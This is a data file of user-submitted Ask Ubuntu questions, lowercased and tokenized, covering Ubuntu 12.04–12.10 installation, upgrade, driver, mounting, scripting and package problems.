202526	how to install edubuntu on a system with low memory ( 256 mb ) ?	i 'm preparing an old system with 256 mb ram to send it to some children . it does n't have ethernet controller and there are no internet access at the destination . i 've chosen edubuntu for obvious reasons and modified it with uck trying to minimize memory usage just to install , let alone using it yet . but ubiquity wo n't start even in openbox ( edited /etc/lightdm/lightdm.conf ) because there are no space left on /cow right after booting . i 've already deleted things like ibus , zeitgeist , update-manager ( no network access after all ) , twisted-core , plymouth logos . i 'm thinking about creating a swap partition on hdd , can it be later added to expand this /cow ? this behavior is reproducible in vm limited to 256mb ram . this question is moved to a follow-up below : is there a package for the text-mode installation which is used on alternate cds ? i do n't want to re-create edubuntu from an alternate cd . follow-ups : how to move packages from the live image to a pool on the disc ? where is the source code for alternate cd installer ?
202531	never before had a problem with ubuntu desktop graphical display ; trying to use nvidia gt630	i 've been using ubuntu since 9.04 and never had a problem with ubuntu bringing up the desktop graphical user interface . however i am currently not able to see anything graphical past the install screens . i have an intel dp55kg motherboard and just installed an nvidia gt630 graphics card ( zotac ) , since the old graphics card failed . i can install the server and see text . so i do a apt-get install ubuntu-desktop ... or apt-get install kubuntu-desktop ... or apt-get install xubuntu desktop , but after the reboot there is no display ... its like something is hung up . i tried using the live quantal dvd and i do see the graphical prompt to try without installing , but after that the screen goes blank . i 've tried two monitors and the same thing happens . there is a faint `` glow '' on the screen and i do not get a `` no input signal '' from the monitor , so something is happening . i can install an old oem of xp so i know the video card and motherboard are at least semi functional . any help is appreciated . thanks , greg
202535	problem with upgrading ubuntu	i tried updating ubuntu 12.04 by following the guide at http : //www.ubuntu.com/download/desktop/upgrade but i received this error message : what do i do ?
202536	ubuntu with kde and kernel 3.6.2 - performance issues	i have recently swiched to ubuntu and installed kde on it . i like software included in ubuntu but interface from kubuntu . my problem is , that after installation of kernel 3.6.2 ( deafult ubuntu 12.04 is 3.2 i think ) - whole kde interface is laggy and i have to render using xrended because opel al doesnt work . so please tell me - i didint find it anywhere - does kde has some problems with new kernel ? should i downgrade back to 3.x.x ? thank you for answers and your time . pelda
202537	transmission shutdown script for multiple torrents ?	i have written a shutdown script for transmission . transmission calls the script after a torrent download finishes . the script runs perfectly on my machine ( ubuntu 11.04 & 12.04 ) . # ! /bin/bash sleep 300s # default display on current host display=:0.0 # find out if monitor is on . default timeout can be configured from screensaver/power configuration . status=`xset -display $ display -q | grep 'monitor'` echo $ status if [ `` $ status '' == `` monitor is on '' ] # # # then check if its still downloading a torrent . could n't figure out how . ( may be ) by monitoring network downstream activity ? then notify-send `` downloads complete '' `` exiting transmisssion now '' pkill transmission else notify-send `` downloads complete '' `` shutting down computer '' dbus-send -- session -- type=method_call -- print-reply -- dest=org.gnome.sessionmanager /org/gnome/sessionmanager org.gnome.sessionmanager.requestshutdown fi exit 0 the problem is that when i 'm downloading more than one file , when the first one finishes , transmission executes the script . i would like to do that but after all downloads are completed . i want to put a 2nd check ( right after monitor check ) if it is still downloading another torrent . is there any way to do this ?
202541	how do i open gnome tweak tool from the terminal ?	i 'm trying the live cd as i am a new user . from the terminal , i have installed gnome tweak tool . after i had installed it , i was n't able to find any icon to open the program . when i opened ubuntu software center and searched for advanced settings , i found that it 's installed but i ca n't open it . is there any method to open it from gui or through a command in terminal ?
202546	synchronizing 3 servers over ip	i 'm setting up a medical server for a hospital that has doctors located in 3 different locations , meaning there would be 3 servers ( 1 in each location ) . all 3 servers would just have the following software : ubuntu server 12.04 minimal mysql , php 5 , apache the medical software which would read/write to the mysql database remote admin apps like nagios & webmin rsync for backup ( rsync-over-ssh ) as a cron job and the doctors at each location would access patient & billing data from their respective servers . what i 'd like is , that each of these servers all have synchronized info ( especially the mysql database 's ) - let 's say on an hourly basis each of these servers synchronize data to a common remote server and the data is then brought down to each of the servers . i know an easier way would be to have the medical app running on a remote web server , but since this is medical that we 're talking about and knowing how common it is in our area for the net to go gown , i would n't like a web based scenatio . is such a setup possible ? would this be the right way to do things or is there a better way to this ? would really appreciate views and comments ( or how to set this up ) on this .
202549	how to upgrade 12.10 beta 2 version to 12.10 final release	i want to upgrade 12.10 beta 2 version to final release of ubuntu 12.10 eagerly waiting . pls do help me .
202552	has anyone found `` submit statistical information '' ?	in most versions of ubuntu i 've used ( including 12.04 ) , there was a tab inside the settings of the update manager ( now called software updater ) that allowed you to submit statistical information . i ca n't find this anywhere in 12.10 , and a dash search is n't finding anything either . has anyone found this ?
202553	how come the update manager wo n't let me upgrade to ubuntu 12.10 ?	i have it set to notify me of all releases of ubuntu .
202558	receiving `` please insert cd error '' when trying to install xubuntu desktop in 12.04	i have installed ubuntu 12.04 . i want to install xfce desktop . when i tried to install xubuntu desktop , i got the following message . sudo apt-get install xubuntu-desktop media change : please insert the disc labeled 'ubuntu 12.04.1 lts _precise pangolin_ - release i386 ( 20120817.3 ) ' in the drive '/cdrom/ ' and press enter i did n't know why i 'm getting this error , and also i do n't have cd drive . i installed ubuntu using usb . please let me know how to install xubuntu desktop .
202560	ca n't mount any partition due to `` /usb : adding read acl for uid 1000 to /media/evil ' failed : operation not supported '' error	i 've upgraded to ubuntu 12.10 and now i ca n't mount any partition . i get the same error with all drives : /usb : adding read acl for uid 1000 to /media/evil ' failed : operation not supported both of my usb drives are fat32 , one is a usb stick , the other is a gopro cam and both were working fine in 12.04 .
202563	how can i donate to ubuntu without paypal ?	when i wanted to download ubuntu 12.10 from ubuntu.com , i was asked to make a donation . however , there is only a paypal option to make the payment . but i do n't use paypal . is there any other option to make the payment ?
202571	how to mount a virtual hard disk ?	is it possible to mount a virtual hard disk ( vhd , hdd , vdi , vmdk ) on ubuntu ? how can this be done ?
202573	how do i install ubuntu with encrypted root , home , and swap partitions ?	i would like to install ubuntu 12.10 with two features : partitioning of my disks ( / and /home should be separated , plus eventually a swap partition ) encryption of those partitions how should i do that in the ubuntu 12.10 installer ? i know i should choose the option `` something else '' at the step called `` allocate drive space '' . but what should i do afterâ that ?
202574	desktop does not show when i installed nvidia drivers !	the desktop does not show after i installed nvidia experimental drivers . i tried nvidia simple proprietary drivers , and they did not work either . here is how it looks . this is not cropped or any thing . this is how it looks , after the installation of the drivers the desktop resolution decreased from 1440x900 to 1024x768 the desktop only shows desh and panels when i use the open source drivers . is there any way to fix this so i can get better performance ?
202579	unable to login - account disabled	ah , recently , i 've been unable to login to my main master account , as it would return me to the login screen after entering my password . thinking i could just delete the account and make a new one , i logged in via the guest account , went to 'user accounts ' and authenticated with the main account 's password . i was successfully able to delete the account , and create a new one . once i returned to the login screen to log in with my new account , it asked for a password , though i had n't set one . the old password does not work either . i returned to the guest account , went to 'user accounts ' , to see that the password field shows `` account disabled '' for my new account . since i deleted my old account , i am unable to authenticate with the master password . i can not add , change , or delete any accounts - nor can i login to it . do n't know what to do from here . edit : also , i tried changing to the textual login screen with ctrl + alt + f2 , but my monitor reads `` input signal out of range - change settings to 1600x1050 '' or something to that effect .
202586	how to install ubuntu , remove mint and set up a separate home partition ?	i 've got a dual-booting laptop - windows 7 & linux mint 13 - and i want to get rid of mint , keep windows 7 and install ubuntu 12.04 . also , i want to have a separate home partition ( i 've only got one disk drive ) so that if i want to go back to mint ( or any other distro ) then i wo n't have to overwrite my home folder again . anyone tell me - in newbie friendly terms - how to do that ?
202592	how do i install burg in ubuntu 12.04 ?	when iâ try installing burg , iâ get the following error : package burg is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package burg-themes is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'burg ' has no installation candidate e : package 'burg-themes ' has no installation candidate i am using ubuntu 12.04 , as a dualboot with windows 7 .
202594	reducing power consumption of intel chipset	i 've just installed xubuntu on my samsung 530u ( ssd version ) and everything works find , but the battery life is dramatically lower comparing to win7 . full battery is able to work about ten hours ( lowest brightness , wifi/bt turned off , just typing in texworks ) , but using xubuntu i get max about 7 hours . i guess i know , where is the problem , here is my list from powertop : bad enable sata link power management for /dev/sda bad runtime pm for pci device asmedia technology inc. asm1042 superspeed usb host controller bad runtime pm for pci device intel corporation 6 series/c200 series chipset family 6 port sata ahci controller bad runtime pm for pci device intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 bad runtime pm for pci device intel corporation 6 series/c200 series chipset family pci express root port 4 bad runtime pm for pci device intel corporation 6 series/c200 series chipset family pci express root port 5 bad runtime pm for pci device intel corporation 6 series/c200 series chipset family pci express root port 1 bad runtime pm for pci device intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 bad runtime pm for pci device intel corporation 6 series/c200 series chipset family mei controller # 1 bad runtime pm for pci device intel corporation 2nd generation core processor family integrated graphics controller i tried ( hard ) to find out solution , but nothing work at all . do you have any idea ? thanks
202596	makefile question : how to make several analogous rules into one	i 'm wondering if there 's a way to make one rule out of the following several rules which are all similar in a makefile that i have to edit : $ ( object_build_dir ) / % .o : $ ( object_src_dir ) / % .cpp $ ( object_build_dir ) / % .d @ echo ... ... ... .. compiling $ < $ ( cc ) -c -o $ @ $ < $ ( object_cflags ) $ ( properties_build_dir ) / % .o : $ ( properties_src_dir ) / % .cpp $ ( properties_build_dir ) / % .d @ echo ... ... ... .. compiling $ < $ ( cc ) -c -o $ @ $ < $ ( properties_cflags ) $ ( wrapper_build_dir ) / % .o : $ ( wrapper_src_dir ) / % .cpp $ ( wrapper_build_dir ) / % .d @ echo ... ... ... .. compiling $ < $ ( cc ) -c -o $ @ $ < $ ( wrapper_cflags ) $ ( socket_build_dir ) / % .o : $ ( socket_src_dir ) / % .cpp $ ( socket_build_dir ) / % .d @ echo ... ... ... .. compiling $ < $ ( cc ) -c -o $ @ $ < $ ( socket_cflags ) notice , aside from the variable name , the rule is exactly the same . is there a nifty makefile trick i can use here ? fyi , *.d are themselves makefiles that are generated by g++ and describe the dependency of a cpp file . thanks .
202602	ubuntu boot halts	after the ubuntu logo the boot halts and all i see is this : stopping anac ( h ) ronistic cron stopping save kernel messages checking battery state stopping system v runlevel comaptibility starting cups printing spooler/server and then it jsut hangs there forever . any help ? i 've tried previous kernel versions from grub with no success
202603	start and shutdown errors 12.10	i just upgraded ubuntu from 12.04 to 12.10 . i am now stuck as i do n't know what to do . the installation have for some reason failed on some place as i am getting error messages on start and shutdown ( restart ) . there were no errors during the installation though . on startup it 's saying that dev/sda is an invalid argument and it takes , quite long , time for it to come right and start normal . on shutdown it wo n't show the old screen but you see the processes made . it also contains an error and it 's talking about shutting down and about apache . i installed through the update manager on ubuntu 12.04 and i had all updates made before downloading and have several times tried to update the new version but there is nothing to update . my files are important to me , though at the currently i could unistall all my programs and only loose some time . does anyone have this problem , please leave a comment and tell me your experience and if you have a ansver how to fix my issues please help . thank you . //viktor
202606	broadband modem fails to get connected in ubuntu 12.10 .	i am now unable to connect to internet with a huwaei e173s-1 . the modem worked perfectly in 11.04 , 11.10 and 12.04 now it gets detected , but can not be connected at all . any help is more than welcome !
202609	using a displaylink usb video adapter on ubuntu 12.10	the line of usb video adapters made by displaylink has a somewhat sordid history under linux . in past ubuntu releases , the process of getting them to work has been somewhat difficult , inspiring a number of past questions on this site : example 1 example 2 example 3 however , there are some indications that version 3.5 of the linux kernel ( which is used by 12.10 ) contains better support for these adapters , which should make them easier to use . i currently have a single-gpu machine ( it is an nvidia adapter ) with dual monitor outputs . i would like to add the displaylink adapter to drive a third external monitor . how can i set this up on ubuntu 12.10 ?
202610	terminal user/machine information changed ?	i 'm using 10.04 lucid . i did some change i do n't remember in /etc/hosts or hostname file that now when i open terminal it shows none @ root i want to change the none to whatever like machine-name ? how can i change it back .
202613	how do i check whether i am using lvm ?	i installed ubuntu by choosing the option `` something else '' at the step called `` allocate drive space '' of the installer . then i created my own partition table . now that ubuntu is installed , can i check whether i am using lvm for my volumes ? in particular , can i see it in gparted partition editor ?
202614	how to upgrade to 12.10 safely ?	so i going to upgrade but , i do n't want to break my computer again so how do i upgrade safely ?
202615	asp.net 4.0 on mod-mono ?	what mono packages do i need to install to run asp.net 4.0 support ? i thought it was mono-apache-server4 but everywhere i look , the descriptions say : asp.net 1.1 backend for mod_mono apache module
202616	can not resolve hostname ?	i ' using lucid 10.04 i used centrify agent to add my ubuntu machine into ad . the machine name is suppose to be abc.company.edu.uk . i have edited /etc/hosts file . it says as 192.168.1.22 abc.company.edu.uk abc . in etc/resolve.conf i have specified dns servers . do i need to change anything in nsswitch.conf files . when i try to ping from other lan pc to abc.company.edu.pk i get no reply ? kindly help .
202619	ubuntu 12.10 - launcher stays hidden	just upgraded to 12.10 today . everything seems fine for now , aprat from one thing : the launcher on the left side of the screen does n't come up after moving the cursor to the left side of the screen . it is there since it show the app start animation and i can have it on top all the time , but i 'm really fond of it being hidden most of the time . i did check the sensitivity settings and even set it up to max ( thus high ) and it changes nothing . please help ; ) cheers
202623	upgrade to 12.10 without update-manager	i 'm currently running ubuntu 12.04 ( sort of ) on my x86 desktop system . ( actually my /etc/lsb-release says : distrib_id=ubuntu distrib_release=12.10 distrib_codename=quantal distrib_description= '' ubuntu quantal ( development branch ) '' probably because i installed a beta release of 12.04 shortly before the official one came out . ) i 'd like to upgrade to the new 12.10 ( non-beta ) release . the usual way to do this is to use the update manager -- but when i run update-manager or any apt-* command ( at least the ones i 've tried ) , it dies with a segmentation fault . here 's what gdb has to say when i try to run apt-cache : $ apt-cache -- version apt 0.8.16~exp12ubuntu10.3 for i386 compiled on aug 20 2012 22:34:48 $ gdb apt-cache [ ... ] ( gdb ) run search git starting program : /usr/bin/apt-cache search git program received signal sigsegv , segmentation fault . 0xb7ee16ce in pkgcache : :veriterator : :translateddescription ( ) const ( ) from /usr/lib/i386-linux-gnu/libapt-pkg.so.4.12 ( gdb ) where # 0 0xb7ee16ce in pkgcache : :veriterator : :translateddescription ( ) const ( ) from /usr/lib/i386-linux-gnu/libapt-pkg.so.4.12 # 1 0x08051bd1 in ? ? ( ) # 2 0xb7eccf6e in commandline : :dispatcharg ( commandline : :dispatch* , bool ) ( ) from /usr/lib/i386-linux-gnu/libapt-pkg.so.4.12 # 3 0x0804e833 in ? ? ( ) # 4 0xb7c044d3 in __libc_start_main ( main=0x804e520 , argc=3 , ubp_av=0xbffff964 , init=0x805bdf0 , fini=0x805be60 , rtld_fini=0xb7fed270 < _dl_fini > , stack_end=0xbffff95c ) at libc-start.c:226 # 5 0x0804e8f1 in ? ? ( ) ( gdb ) the dpkg command does n't have this problem . i 've tried reinstalling libapt-pkg4.12 ( the package that provides /usr/lib/i386-linux-gnu/libapt-pkg.so.4.12 ) , and it did n't help . my goal is to upgrade to 12.10 ( not beta ) and have update-manager and the apt-* commands working properly . can i update my existing system from a dvd or usb thumb drive ( i 'm downloading ubuntu-12.10-desktop-i386.iso right now ) without wiping out my existing files ? if not , can i reinstall or repair my libapt-pkg4.12 and/or apt packages and get apt-* and update-manager working again ? if not , i suppose my remaining option is to install 12.10 from scratch and then restore my files from a backup -- which i 'll do if i have to , but i 'd rather leave my files in place . ( i have a backup anyway in case something goes wrong during a normal upgrade . ) update : a google search for the error message ( which i should have done before ) led me to bug # 970988 , which refers to a crash in the same translateddescription ( ) routine . it 's closed as a duplicate of bug # 938116 . it 's supposedly fixed by update-manager 1:0.156.12 -- but i already have update-manager 1:0.156.14.9 , and i 'm still getting the crash . i do n't see anything in either bug report that suggests a way to fix the problem on my system ( other than reinstalling ) . one of the bug reports mentions that somebody encountered the bug after installing skype , and fixed it by uninstalling skype . i happen to have installed skype around the time this problem showed up , but uninstalling it has n't helped .
202625	mass audio encoder	i have a few thousand flac files which i would like to transcode to ogg vorbis , but i ca n't find any suitable tools for the job . to name a few i have tried so far and why they are unsuitable : oggenc is single-threaded and would require me to automate it myself , mencoder requires the input to also contain video , and abcde assumes the input is a cd . the ideal tool should be multi-threaded , and support inputing multiple files located in different directories simultaneously . cli or gui makes no matter . does such a tool exist ?
202626	windows 7 wo n't see ubuntu 12.04 shares	i have a desktop with ubuntu 12.04 running , with samba installed . my laptop , which has windows 7 on it , can connect to the linux machine via ip , the ubuntu machine flawlessly navigates to the windows machine , and both machines see each other 's netbios names when nbtscan is run on each machine . so it seems that it should be working . regardless , on the windows 7 laptop , browsing via the network browser will not show the network name of the linux machine . i 'm thinking it 's something on the windows machine , since the netbios names seem to be propogating . any ideas ?
202630	ca n't mount any partitions - acl error	i 've install ubuntu 12.10 and now i ca n't mount any partitions . i get the same error with drives : adding read acl for uid 1000 to /media/proach failed : operation not supported
202631	how do i reenable webapps prompts in 12.10 ?	i hit the 'do n't show me again ' button on the webapps integration prompt . how do i reenable them or how can i alternatively add webapps to the dash ?
202633	unable to install bind9 on ubuntu 12.04	i cant install the bind server i was trying to do clean rap cache and update . this is what i get after running the apt-get install bind8 / apt-get install -f bind9 : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : **the following packages have unmet dependencies : bind9 : depends : libbind9-80 ( = 1:9.8.1.dfsg.p1-4 ) but 1:9.8.1.dfsg.p1-4ubuntu0.2 is to be installed depends : libdns81 ( = 1:9.8.1.dfsg.p1-4 ) but 1:9.8.1.dfsg.p1-4ubuntu0.2 is to be installed depends : libisc83 ( = 1:9.8.1.dfsg.p1-4 ) but 1:9.8.1.dfsg.p1-4ubuntu0.2 is to be installed depends : libisccc80 ( = 1:9.8.1.dfsg.p1-4 ) but 1:9.8.1.dfsg.p1-4ubuntu0.2 is to be installed depends : libisccfg82 ( = 1:9.8.1.dfsg.p1-4 ) but 1:9.8.1.dfsg.p1-4ubuntu0.2 is to be installed depends : liblwres80 ( = 1:9.8.1.dfsg.p1-4 ) but 1:9.8.1.dfsg.p1-4ubuntu0.2 is to** be installed e : unable to correct problems , you have held broken packages .
202637	upgrade popup says my graphic hardware is not supported . is this true ?	i have an hp pavilion dv7 with a radeon hd4200 graphic card . when i try to upgrade i get this message -your graphics hardware may not be fully supported in ubuntu 12.10 . running the 'unity ' desktop environment is not fully supported by your graphics hardware . you will maybe end up in a very slow environment after the upgrade . our advice is to keep the lts version for now . for more information see https : //wiki.ubuntu.com/x/bugs/updatemanagerwarningforunity3d do you still want to continue with the upgrade ? should i continue or not ?
202638	how do i remove unwanted options from the splash screen ? cinnamon 1.61	i have installed ubuntu 12.10 and cinnamon 1.61 . now , i have the following desktop environments as options in my login screen : cinnamon cinnamon 2d gnome gnome classic gnome classic ( no effect ) kde plasma worspace ubuntu i would like to remove gnome classic , gnome clasic ( no effect ) and the kde , how can accomplish this task ? thank you mario
202643	any ubuntu version do n't boot	any ubuntu version do n't boot . i tried dvd 's with ubuntu 12.04 lts 64 bit , 32 bit ; 11.04 64 bit , 32 bit . i tried also usb drive with ubuntu 12.04 lts 64 bit , 32 bit . there was no respond with dvd 's at all , with usb there was written `` syslinux '' on a black screen and nothing happen . i have my hdd prepared with ext3 and linux-swap partitions . i 'm using acer aspire 4920 . intel core 2 duo 1.66ghz 2 gb ram i tried from windows xp as well as windows 7 . my first try was to install ubuntu on the blanc hhd . i really want to use ubuntu instead of any windows , but i had tried so many things and i ca n't get it to even boot . can anybody help me install ubuntu 12.04 lts ? best regards matt
202644	how to install nvidia optimus driver ?	i have followed http : //ubuntuportal.com/2012/01/bumblebee-3-0-tumblewed-nvidia-optimus-gpu-switching-for-linux-has-been-released-how-to-install-bumblebee-3-0-on-ubuntu.html this guide to install nvidia driver on my dell inspiron n5110 notebook ( intel hd graphics 3000 + nvidia geforce gt525m ) , but i always get some error while i want to start any program with the optirun command . terminal says : adam @ adam-lt : ~ $ optirun firefox [ 1482.559417 ] [ error ] can not access secondary gpu - error : could not load gpu driver [ 1482.559517 ] [ error ] aborting because fallback start is disabled . my laptop cooler always cools the laptop , which means that nvidia card is consuming power in the background . ( terminal sometimes says something daemon-server is not running . ) can you give me some solution for this ?
202647	can i install mainline kernel in 12.04 ?	can i download latest .deb file of kernel from http : //kernel.ubuntu.com/~kernel-ppa/mainline/ ( for example v3.7-rc1-quantal ) and install it on ubuntu 12.04.1 lts ( precise ) or any old ubuntu like 10.04 lts ?
202649	initial purple boot screen is text not image in 12.10	since the upgrade on the purple boot screen i am getting a simple text ubuntu 12.10 over 4 small pulsing dots in 12.04 i was getting an image and not text- does this mean anything is wrong ?
202650	identifying workspaces	new ubuntu 12.04 user - having workspaces is quite useful , but is there a way to easily identify which is which ? in other words , if i have a terminal open in three of the workspaces it would be nice to have ( for instance ) the background colour of each workspace unique . is there any way to do that or something similar ( e.g . different wallpaper ? ) thanks ...
202655	ubuntu 12.10 server turns monitor black	after upgrading ( and after that i did a clean install ) to ubuntu 12.10 server my monitor turns black after choosing ubuntu in grub . i read several tips about uninstalling proprietary nvidia drivers but my system does n't have them . i 'm using an intel atom d2700 on its own board d2700mud and graphic is onboard ( gma3650 ) . ubuntu 12.04 worked fine but as this server is not for production and was set up only a week ago i 'd like to use ubuntu 12.10 and i do not understand this issue .
202656	warning : require_once ( http/request2.php ) : failed to open stream:	i have read many posts that tell me this is because pear is not installed . my issue is that it is installed and i have tried to re-install it without success . i have my php.ini file set to include_path= ' . : /usr/share/php : /usr/share/php/pear' i have logged into the system by ftp and the files exist and everything appears to be installed properly . where have i gone wrong . full error : warning : require_once ( http/request2.php ) : failed to open stream : no such file or directory in /var/www/test.php on line 3 fatal error : require_once ( ) : failed opening required 'http/request2.php ' ( include_path= ' . : /usr/share/php : /usr/share/php/pear : /usr/share/pear ' ) in /var/www/test.php on line 3 line 3 : require_once ( 'http/request2.php ' ) ; i have checked the installation of http_request2 and it is installed and up to date . edit : could this be caused by some type of permissions ?
202657	how to move packages from the live image to a pool on the disc ?	currently i 'm using uck and trying to make edubuntu 12.04.1 dvd launch installer on 256mb ram : how to install edubuntu on a system with low memory ( 256 mb ) ? i was reading release notes for 12.10 and noticed that language packs have now been moved off from the live image to a pool on the disc . how can i move other packages correctly so they would be available to the live system and for installation without network access ?
202658	how can i fix 12.10 theme changes that make unreadable dialogs in eclipse	changes in window themes of something of the sort is causing the popup dialogs in eclipse to have a very dark background . then , since eclipse uses hyperlinks in dialogs , i get blue on black , and it 's basically unreadable . i tried changing themes in ubuntu tweak , but nothing seemed to affect the background color of that dialog . can anyone help ? what i 'm looking at : http : //imgur.com/nprg1
202660	stop ubuntu from upgrading with specific updates	i have ppa installed on my ubuntu 12.04 system and it keeps prompting me with an update for a certain application ; this update breaks the software . the ppa itself also has many different applications which work great . is there anyway to keep this ppa installed , with it updating the other applications , while stopping it from updating one of them .
202669	12.10 wants to install multiarch : i386-packages	i have an amd64 system without any i386 multiarch packages . after successfully upgrading to 12.10 , aptitude seems to want to install a few , and i ca n't tell why : $ sudo aptitude safe-upgrade resolving dependencies ... the following new packages will be installed : gcc-4.7-base : i386 { a } libarmadillo3 { a } libboost-date-time1.49-dev { a } libboost-serialization1.49-dev { a } libboost-serialization1.49.0 { a } libboost-thread1.49-dev { a } libboost1.49-dev { a } libc6 : i386 { a } libgcc1 : i386 { a } libgdal1 { a } libhdf5-7 { a } libltdl7 : i386 { a } libnetcdfc7 { a } libodbc1 : i386 { a } libreadline6 : i386 { a } libtinfo5 : i386 { a } odbcinst1debian2 : i386 { a } unixodbc : i386 { a } why libc6 : i386 , for example ? i ask.. $ aptitude why libc6 : i386 p icoutils : i386 provides icoutils p icoutils : i386 depends libc6 : i386 ( > = 2.8 ) ... alright , but why icoutils : i386 ? $ aptitude why icoutils : i386 p icoutils : i386 provides icoutils but i already have the amd64 version of icoutils : $ aptitude search icoutils i icoutils - create and extract ms windows icons and cursors p icoutils : i386 - create and extract ms windows icons and cursors has some multiarch behavior changed recently , or am i just overlooking something ? addendum : chasing down from gcc-4.7-base : i386 , i 'm led to qdbus : i386 , which is up for installation since it provides qdbus ... which i already have .
202670	change google chrome language ?	today i installed the new ubuntu 12.10 ( fresh install ) and i noticed that google chrome was in the wrong language . i am portuguese , from portugal , and google chrome is now on brazilian portuguese ( which is kind of annoying ) . i had this problem before , but downloading the dvd edition of the os would fix the problem ( google chrome would be in pt-pt on a dvd installation ) . the problem is that ubuntu 12.10 does n't have a dvd specific edition ... so , how can i manualy change google chrome 's language ?
202671	ubuntu 12.10 web apps does not work	i just updated from 12.04 to 12.10 but i can not find how to add web apps - gmail . if i opened gmail in chrome and later in firefox nothing happened . how to add them ? do i need install something before ?
202677	nvidia driver does n't work in 12.10	i have geforce gtx 560 ti . i 's worked fine in 12.04 with nvidia drivers . unfortunately , after todays 12.10 update , something broke down . i 've tried nvidia-current , nvidia-current-updates and nvidia-experimantal . always the same behaviour : bad resolution in lightdm , after logging nothing except wallpaper . no unity panels , `` win '' key does n't work . after removing nvidia drivers everything work .
202679	multiple version of grub ?	i am running ubuntu 12.04.1 lts ( gnu/linux 3.2.0-29-generic-pae i686 ) which according to the ubuntu documentation contains grub2 . however grub -- version gives me grub ( gnu grub 0.97 ) , but grub-mkconfig -- version gives me grub-mkconfig ( grub ) 1.99-21ubuntu3.4 do i have 2 versions of grub installed simultaneously ? if so , what is the easiest and safest way to remove one . if not , which configuration file should i edit ? i have edited /etc/grub.d/40_custom to contain a password , but running update-grub does not appear to include this in the grub.cfg file .
202681	12.04 making bcm4313 card work with aircrack-ng ?	i 'm a real linux noob , just started using it ( this month ) and until now i had no issues . now i 'm trying to set-up aircrack-ng on my laptop , but it seems like it 's using the worst card possible ( or almost ) there is a ton of tutorial on this card ( seems to be hell to set-up ) i have tryed some , but i ended up uninstalling my drivers , messing with my desktops , and ended by having no more `` x '' to close my windows ( i have no clue how i ended there ) i just re-installed my linux ( took me 2 hours to setup everything again ) , but now i 'm a bit `` scared '' to try tutorials randomly again . right now it says the driver is wl , wich is not the one i want ( afaik it 's not supported ) i 'm not sure what kind of informations are needed , but here 's what i think could be usefull . lspci -knn 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller [ 8086:0104 ] ( rev 09 ) subsystem : samsung electronics co ltd device [ 144d : c0a5 ] kernel driver in use : agpgart-intel 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200/2nd generation core processor family pci express root port [ 8086:0101 ] ( rev 09 ) kernel driver in use : pcieport kernel modules : shpchp 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) subsystem : samsung electronics co ltd device [ 144d : c0a5 ] kernel driver in use : i915 kernel modules : i915 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 [ 8086:1c3a ] ( rev 04 ) subsystem : samsung electronics co ltd device [ 144d : c0a5 ] kernel driver in use : mei kernel modules : mei 00:1a.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 [ 8086:1c2d ] ( rev 04 ) subsystem : samsung electronics co ltd device [ 144d : c0a5 ] kernel driver in use : ehci_hcd 00:1b.0 audio device [ 0403 ] : intel corporation 6 series/c200 series chipset family high definition audio controller [ 8086:1c20 ] ( rev 04 ) subsystem : samsung electronics co ltd device [ 144d : c0a5 ] kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 1 [ 8086:1c10 ] ( rev b4 ) kernel driver in use : pcieport kernel modules : shpchp 00:1c.3 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 4 [ 8086:1c16 ] ( rev b4 ) kernel driver in use : pcieport kernel modules : shpchp 00:1c.4 pci bridge [ 0604 ] : intel corporation 6 series/c200 series chipset family pci express root port 5 [ 8086:1c18 ] ( rev b4 ) kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller [ 0c03 ] : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 [ 8086:1c26 ] ( rev 04 ) subsystem : samsung electronics co ltd device [ 144d : c0a5 ] kernel driver in use : ehci_hcd 00:1f.0 isa bridge [ 0601 ] : intel corporation hm65 express chipset family lpc controller [ 8086:1c49 ] ( rev 04 ) subsystem : samsung electronics co ltd device [ 144d : c0a5 ] kernel modules : itco_wdt 00:1f.2 sata controller [ 0106 ] : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller [ 8086:1c03 ] ( rev 04 ) subsystem : samsung electronics co ltd device [ 144d : c0a5 ] kernel driver in use : ahci 00:1f.3 smbus [ 0c05 ] : intel corporation 6 series/c200 series chipset family smbus controller [ 8086:1c22 ] ( rev 04 ) subsystem : samsung electronics co ltd device [ 144d : c0a5 ] kernel modules : i2c-i801 01:00.0 3d controller [ 0302 ] : nvidia corporation gf108 [ geforce gt 540m ] [ 10de:0df4 ] ( rev a1 ) subsystem : samsung electronics co ltd device [ 144d : c0a5 ] kernel driver in use : nouveau kernel modules : nouveau , nvidiafb wireless card 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : wistron neweb corp. device [ 185f:051a ] kernel driver in use : wl kernel modules : wl , bcma , brcmsmac rest ... 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) subsystem : samsung electronics co ltd device [ 144d : c0a5 ] kernel driver in use : r8169 kernel modules : r8169 04:00.0 usb controller [ 0c03 ] : nec corporation upd720200 usb 3.0 host controller [ 1033:0194 ] ( rev 04 ) subsystem : samsung electronics co ltd device [ 144d : c0a5 ] kernel driver in use : xhci_hcd also , if i 'm `` screwed '' with my hardware , just tell me .
202687	how do i configure the launcher to “dodge windows” in ubuntu 12.10 ?	how do i configure the launcher to “dodge windows” in ubuntu 12.10 ? i use this in sudo apt-add-repository ppa : ikarosdev/unity-revamped sudo apt-get update sudo apt-get dist-upgrade 12.04 but not working in 12.10 plases help me .
